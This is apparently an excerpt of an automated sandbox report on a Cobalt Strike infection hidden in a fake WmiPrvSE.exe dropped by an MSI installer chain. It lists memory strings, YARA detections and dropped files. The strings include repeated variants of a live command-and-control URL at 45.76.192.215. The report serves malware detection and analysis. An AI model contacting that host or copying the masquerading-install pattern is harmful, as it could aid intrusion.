Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load5F.J
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load;F$J
Source: WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadCY
Source: WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadGFxJ(
Source: WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadMFvJ&
Source: WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadYF
Source: WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadcs
Source: WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859777819.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadgY
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1606499631.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1650092146.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadkFTJ
Source: WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733263656.00000000008B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadkY
Source: WmiPrvSE.exe, 00000017.00000003.2487435512.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadnY
Source: WmiPrvSE.exe, 00000017.00000002.3871035138.0000000000876000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/loadv
Source: WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/oad
Source: WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/oad5F.J
Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/oad;F$J
Source: WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/qFbJ
Source: WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/sX(J
Source: WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/vFoJ
Source: powershell.exe, 00000009.00000002.1578339616.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1526031150.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1530745169.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1533999490.0000000005261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1534232115.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1600170411.00000000058EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1578339616.0000000004B23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1532861117.000000000646C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1557726516.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1566977272.00000000062CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EF7234CDBB1649702229F955C785C39F	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49855FCDFA62840A2838AEF1EFAC3C9B	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe

Code function: 5_2_00007FF7BB23C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

5_2_00007FF7BB23C2F0

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_00771268 CreateProcessWithLogonW,GetLastError,

23_2_00771268

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_0006C120 GetForegroundWindow,MessageBoxW,GetCurrentProcess,OpenProcessToken,CloseHandle,GetLastError,ExitWindowsEx,CloseHandle,

4_2_0006C120

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\643ea8.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3FB2.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4020.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4060.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4080.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI40BF.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI40EF.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{88D74BC3-DFDB-412A-9165-9910293F91BC}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4304.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\643eab.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\643eab.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI44AA.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4577.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	File created: C:\Windows\SystemTemp\AI_4A51.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	File created: C:\Windows\SystemTemp\AI_4A51.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	Jump to behavior
